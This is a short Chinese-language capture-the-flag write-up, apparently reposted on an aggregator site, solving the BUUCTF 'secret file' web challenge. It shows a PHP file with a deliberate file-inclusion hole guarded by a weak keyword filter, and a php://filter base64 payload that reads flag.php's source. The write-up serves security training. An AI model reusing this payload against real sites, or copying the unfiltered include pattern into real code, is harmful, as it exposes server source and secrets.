当前位置: 代码迷 >> 综合 >> buuctf secret file
  详细解决方案

buuctf secret file

热度:12   发布时间:2023-12-05 20:41:13.0

buuctf secret file

  • /Archive_room.php
  • action.php
  • secr3t.php
  • 秘密

/Archive_room.php

F12看源码 找到链接
在这里插入图片描述

action.php

继续跳转
在这里插入图片描述这时发现什么也没有在这里插入图片描述再回去看 跳转的是action但转到end里了
burp重发 打开action.php
发现secr3t.php

secr3t.php

<?phphighlight_file(__FILE__);error_reporting(0);$file=$_GET['file'];if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
    echo "Oh no!";exit();}include($file); 
/flag放在了flag.php里
?>

flag.php打开啥也没有
想到是要文件包含 base64打开
?file=php://filter/convert.base64-encode/resource=flag.php

在这里插入图片描述

秘密

在这里插入图片描述
I just want to say that me too(? _ ?)

  相关解决方案